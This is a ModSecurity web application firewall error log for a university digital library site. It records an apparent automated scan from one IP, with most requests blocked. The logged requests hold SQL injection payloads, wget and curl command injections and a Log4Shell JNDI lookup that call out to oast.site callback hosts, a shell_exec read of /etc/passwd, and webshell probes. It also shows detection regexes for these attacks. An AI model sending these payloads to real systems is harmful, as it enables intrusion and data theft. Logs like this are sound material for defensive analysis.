[Tue Aug 29 11:30:16.334905 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlgpzptrse8xtsm9.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlgpzptrse8xtsm9.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlgpzptrse8xtsm9.oast.site\\x5c\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WMCo-f0AAAOM4UkAAAAU"]
[Tue Aug 29 11:30:17.388409 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WcCo-f0AAAPMl94AAAAY"]
[Tue Aug 29 11:30:19.650702 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10W8Co-f0AAAPXAjEAAAAi"]
[Tue Aug 29 11:30:20.459280 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XMCo-f0AAANjpw8AAAAT"]
[Tue Aug 29 11:30:21.331083 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XcCo-f0AAAOOuTMAAAAW"]
[Tue Aug 29 11:30:22.682887 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlge6361znjdzucb.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10XsCo-f0AAAPPSuMAAAAd"]
[Tue Aug 29 11:30:23.315590 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10X8Co-f0AAAPXAkcAAAAi"]
[Tue Aug 29 11:30:23.328491 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10X8Co-f0AAANh1psAAAAA"]
[Tue Aug 29 11:30:24.317031 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10YMCo-f0AAANjpxEAAAAT"]
[Tue Aug 29 11:30:24.379294 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YMCo-f0AAAPENcIAAAAQ"]
[Tue Aug 29 11:30:25.307882 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10YcCo-f0AAAPENcMAAAAQ"]
[Tue Aug 29 11:30:25.407850 2023] [:error] [pid 991] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlg5be9y1r18ru6c.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO10YcCo-f0AAAPfm7cAAAAR"]
[Tue Aug 29 11:30:25.595018 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YcCo-f0AAANh1qMAAAAA"]
[Tue Aug 29 11:30:27.655382 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilib.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10Y8Co-f0AAAOIvUIAAAAM"]
[Tue Aug 29 11:30:27.668054 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilib.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10Y8Co-f0AAAOIvUIAAAAM"]
[Tue Aug 29 11:30:28.386603 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZMCo-f0AAAPNBSAAAAAZ"]
[Tue Aug 29 11:30:29.394565 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZcCo-f0AAAPiBfQAAAAB"]
[Tue Aug 29 11:30:30.404936 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ZsCo-f0AAAPiBfYAAAAB"]
[Tue Aug 29 11:30:30.534121 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10ZsCo-f0AAAPENdUAAAAQ"]
[Tue Aug 29 11:30:32.626853 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10aMCo-f0AAAPpWbwAAAAI"]
[Tue Aug 29 11:30:33.604186 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10acCo-f0AAAPDnxgAAAAP"]
[Tue Aug 29 11:30:34.314508 2023] [:error] [pid 1008] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlgyz8yhxwf8f8af.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/search.php"] [unique_id "ZO10asCo-f0AAAPw@TkAAAAR"]
[Tue Aug 29 11:30:34.409101 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "digilib.unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10asCo-f0AAAPDnx0AAAAP"]
[Tue Aug 29 11:30:34.478507 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilib.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPv-EgAAAAM"]
[Tue Aug 29 11:30:34.492083 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilib.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPv-EgAAAAM"]
[Tue Aug 29 11:30:35.368167 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10a8Co-f0AAANh1rwAAAAA"]
[Tue Aug 29 11:30:35.745548 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10a8Co-f0AAAOOuWAAAAAW"]
[Tue Aug 29 11:30:36.433493 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bMCo-f0AAAPiBg0AAAAB"]
[Tue Aug 29 11:30:37.338835 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bcCo-f0AAAPENeIAAAAQ"]
[Tue Aug 29 11:30:37.359681 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bcCo-f0AAAPDnyMAAAAP"]
[Tue Aug 29 11:30:37.585063 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bcCo-f0AAAPxBS4AAAAS"]
[Tue Aug 29 11:30:37.643426 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10bcCo-f0AAAPpWdcAAAAI"]
[Tue Aug 29 11:30:39.452931 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilib.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAO877AAAAAF"]
[Tue Aug 29 11:30:39.455114 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilib.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAO877AAAAAF"]
